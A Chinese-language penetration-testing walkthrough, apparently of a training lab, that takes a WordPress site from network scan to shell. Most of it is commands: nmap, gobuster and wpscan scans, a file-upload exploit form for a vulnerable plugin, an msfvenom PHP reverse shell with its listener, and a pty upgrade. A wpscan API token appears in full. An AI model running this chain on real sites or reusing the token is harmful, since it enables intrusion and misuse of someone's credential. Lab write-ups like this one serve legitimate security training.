(1)扫描ip
nmap 192.168.7.0/24
nmap -sn 192.168.7.0/24 | grep -B 2 '08:00:27:51:61:91'
(2)目录扫描
(3)端口扫描
(4)访问网站...并使用gobuster进行目录扫描...没有啥有价值的信息...回到页面上发现网站路径...为/var/www/html/g@web对其进行访问使用火狐插件Wappalyzer发现站点为Wordpress5.3.2...
gobuster dir -u http://192.168.7.202/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
(5)尝试使用wpscan列出站点的用户和密码...发现该站点的一个WP Json Api地址访问...可在描述字段中发现一个密码hackNos@9012!!对其默认后台登录界面访问并尝试登录...,发现登录不上
wpscan --url http://192.168.7.202/g@web -e u --api-token NCpd6sIerdVHZ48sTMJ4RIeawnhpImnOrjaxXiXgIX0
(6)使用wpscan对其网站进行漏洞扫描...发现远程代码执行漏洞...对其利用信息访问...拿取到POC并修改保存成HTML文件....
wpscan --url http://192.168.7.202/g@web -e vp --api-token NCpd6sIerdVHZ48sTMJ4RIeawnhpImnOrjaxXiXgIX0
访问https://wpscan.com/vulnerability/85d3126a-34a3-4799-a94b-76d7b835db5f/,获取到POC:
<form method="post" enctype="multipart/form-data" action="http://192.168.7.202/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
After doing this, an uploaded file can be accessed at, say:
http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml
vim zz.html
(7)使用MSF生成PHP木马并开启监听,使用浏览器打开POC.html的文件将生成的php shell行上传,并访问上传Shell页面,访问上传的Shell并接收到会话
#开启msf
msfconsole
#生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.48 LPORT=1234 x> shell.phtml
#开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.48
set LPORT 1234
exploit
(8)双击生成的poc,并将刚才生成的shell.phtml上传
#shell上传页面
http://192.168.7.202/g@web/wp-content/uploads/wpsp/
(9)监听
(10)创建一个伪终端
#调用/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
